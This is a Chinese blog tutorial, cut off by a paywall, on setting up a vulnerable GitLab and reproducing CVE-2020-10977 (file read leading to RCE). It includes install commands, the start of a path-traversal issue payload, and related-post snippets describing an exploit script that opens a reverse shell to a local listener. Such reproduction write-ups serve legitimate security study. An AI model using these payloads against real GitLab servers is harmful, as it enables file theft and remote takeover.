CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记

原创 已于 2023-03-01 13:54:01 修改 · 3.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #gitlab #经验分享 #linux

于 2020-10-29 09:52:15 首次发布
本文详细介绍了Gitlab的CVE-2020-10977漏洞,包括环境搭建、任意文件读取及远程命令执行的复现过程。通过新建项目、移动issue,利用Gitlab的配置漏洞,最终实现RCE。同时,分享了exploit-db上的EXP和经验,包括python脚本的修正与使用。

Gitlab任意文件读取导致远程命令执行

由于漏洞较新,复现不易,如果觉得对你帮助麻烦点个赞,转载请联系作者并标明出处,谢谢!!

漏洞环境搭建-Centos7

1.安装依赖软件

yum -y install policycoreutils openssh-server openssh-clients postfix

2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要)

systemctl enable postfix && systemctl start postfix

3.下载gitlab安装包,然后安装
官方下载:
CE下载地址:https://packages.gitlab.com/gitlab/gitlab-ce
EE下载地址:https://packages.gitlab.com/gitlab/gitlab-ee

清华开源镜像站下载:
centos 6系统的下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el6
centos 7系统的下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7

漏洞版本范围在>=8.5,<=12.9

(ps:测试9.5.0的版本时没有找到move issue功能。查看当前gitlab版本命令:cat
/opt/gitlab/embedded/service/gitlab-rails/VERSION)

下载rpm包并安装:

wget https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-9.5.0-ce.0.el7.x86_64.rpm

rpm -i gitlab-ce-9.5.0-ce.0.el7.x86_64.rpm

4.修改gitlab配置文件指定服务器ip和自定义端口

vim /etc/gitlab/gitlab.rb
在这里插入图片描述
这里我设置了8888端口

5.重置并启动Gitlab
执行以下命令

gitlab-ctl reconfigure

gitlab-ctl restart

显示成功启动之后,访问端口进入Gitlab页面,提示修改root密码

PS:若出现502页面,多次刷新页面即可,这是由于Gitlab性能要求比较高,服务器响应慢导致的,推荐虚拟机内存至少分配4G。

漏洞复现

测试版本为gitlab-12.8.7-ce

任意文件读取

0x001 新建两个测试项目

在这里插入图片描述

0x002 在其中一个project中创建新的issue,在其问题描述中输入下方代码,然后提交

![a](/uploads/1111111111111111111111111
最低0.47元/天 解锁文章
GitLab任意文件读取漏洞复现(CVE-2020-10977)
渗透之路,攻防之间皆学问
01-15 9250
GitLab GitLab是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目。它拥有与Github类似的功能,能够浏览源代码,管理缺陷和注释。可以管理团队对仓库的访问,它非常易于浏览提交过的版本并提供一个文件历史库。它还提供一个代码片段收集功能可以轻松实现代码复用,便于日后有需要的时候进行查找。 简单来说,GitLab就是一个与github差不多的项目管理和代码托管平台 官网:https://docs.gitlab.c
Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp
god_Zeo的安全博客
10-31 6354
0x01 漏洞介绍&原理 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响: 漏洞触发ExifTool功能处,ExifTool是用于从图像中移除元数据的开源工具,在解析上传图像中的元数据时,并没有完全解析某些元数据,导致攻击者上传带有恶意元数据的图片,从而导致远程命令执行。 攻击者可以通过一个存在
GitLab任意文件读取漏洞CVE-2020-10977复现
玄道的网安博客
12-01 4008
漏洞概述 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 影响版本 GitLab GitLab EE >=8.5,<=12.9 GitLab GitLab C...
Gitlab任意文件读取漏洞cve-2020-10977
weixin_45006525的博客
04-27 3034
Gitlab任意文件读取漏洞cve-2020-10977) 简介: GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。 在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。 ...
GitLab-EE 安装(含获取许可)
最新发布
运维工程师技术分享
09-18 1077
本文介绍了在Debian 12系统上通过软件包安装GitLab EE的详细步骤。主要内容包括:1)添加软件包存储库并安装指定版本;2)配置实例URL(external_url参数);3)可选的外部PostgreSQL数据库配置;4)可选的SMTP邮件服务器设置;5)通过配置文件修改后使用gitlab-ctl reconfigure命令生效配置。此外还提供了生成GitLab许可证的方法,包括创建Ruby脚本生成密钥和许可证文件,以及替换系统公钥的操作流程。整个安装过程完成后,用户可通过设定的URL访问GitL
CVE-2020-10977 GitLab任意文件读取漏洞复现
akdjfhx的博客
11-16 1785
CVE-2020-10977 GitLab任意文件读取漏洞复现
HackTheBox - laboratory(CVE-2020-10977)
z4yn:)的博客
04-16 561
laboratory #0 Nmap 收集信息 nmap 10.10.10.26 -p- 根据Nmap的综合扫描来看,有两个域名laboratory.htb和git.laboratory.htb。 ─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~] └──╼ [★]$ nmap 10.10.10.216 -p- Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:34 U..
CVE-2020-10977复现过程
weixin_39811856的博客
11-30 2063
老规矩上一下漏洞详情 漏洞详情: GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。该程序可用于查阅项目的文件内容、提交历史、Bug列表等。 GitLab(企业版和社区版)12.9之前版本中存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。 POC: #!/usr/bin/env python3 import sys import jso.
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http:
GitLab任意文件读取漏洞CVE-2020-10977重现
cumt_TTR的专栏
11-27 2195
漏洞描述 地址: https://www.freebuf.com/vuls/235982.html Gitlab安装 官方地址: https://docs.gitlab.com/omnibus/docker/ 启动docker: 注意版本号,不要用最新版本,这个漏洞是有相关版本的 docker run --detach \ --hostname 192.168.1.22 \ --publish 9443:443 --publish 980:80 --publish 922:22 \ -
CVE-2020-10977:Gitlab v12.4.0-8.1 RCE
05-07
亚搏体育app v12.4.0-12.8.1 RCE 完全基于 ,这对我不起作用,HTML解析的内容似乎很麻烦,因此我将其重写为js。 用法 以通常的方式启动反向shell处理程序,然后使用以下命令运行此脚本: TARGET_URI= " https://target " TARGET_EMAIL_DOMAIN= " laboratory.htb " \ TARGET_USER= " test " TARGET_PASSWORD= " Test pass 123 " \ LOCAL_IP= " 10.10.14.142 " LOCAL_PORT= " 44044 " \ node gitlab_rce.js 可以使用TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"指定代理。 Burp在此调试中特别有用。 这是做什么的 检查目标是否达到 如果提
GitLab修复GitHub import函数中的RCE漏洞
smellycat000的专栏
10-14 560
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士摘要GitLab 中存在一个漏洞,可导致攻击者对GitLab服务器发动多种攻击,包括托管在云上的GitLab.com平台。该漏洞的编号是CVE-2022-2884,CVSS评分为9.9。该漏洞安全研究员 “yvvdwf” 报告,是因为GitLab 从GitHub 导入数据的方式不正确造成的,可被用于在主机服务器上运行命令。01不安全的impor...
Gitlab 未授权RCECVE-2021-22205)漏洞分析及排查
dayouzi的博客
08-11 2027
GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行
GitLab 修复严重的RCE漏洞
smellycat000的专栏
07-04 803
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修复了一个严重漏洞,可导致攻击者远程执行代码。该漏洞的编号是CVE-2022-2185。该漏洞的等级为“严重”,出现在GitLab的所有版本中:14.10.5之前的14.0版本、15.0.4之前的15.0版本以及15.1.1之前的15.1版本。GitLab 在一份安全公告中指出,认证用户可导入恶意构造的项目...
CVE漏洞复现-CVE-2021-22205 GitLab未授权 RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 1563
2021年4月15日,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021-22205)。由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影响,CVSS评分为9.9。
php目录穿越漏洞攻击,GitLab任意文件读取漏洞CVE-2020-10977
weixin_35652131的博客
03-24 426
2020年4月28日,GitLab的一个任意文件读取漏洞漏洞细节被公开。该漏洞补丁于2020年3月26号由GitLab官方发布。相关组件介绍GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。漏洞分析当GitLab...
漏洞复现CVE-2021-22205 GitLab 未授权RCE
Adminxe的博客
10-31 1155
0x00 漏洞简介: 漏洞出来第一时间,听漏洞浍测的朋友传来的情报,就及时给了POC,但一直没复现,只是简单看了文章,提到需要可以注册用户才能进行攻击,然后就感觉挺鸡肋,没有再继续看。 恰巧好基友涛子给我发来他复现的文章,看了看exp,感觉并没那么鸡肋,相反可以通过未授权进行权限的获取,正好自己也复现了一手,同时借用涛子的文章给大家展现了出来。 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。 GitLab是一款Ruby开发的G..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值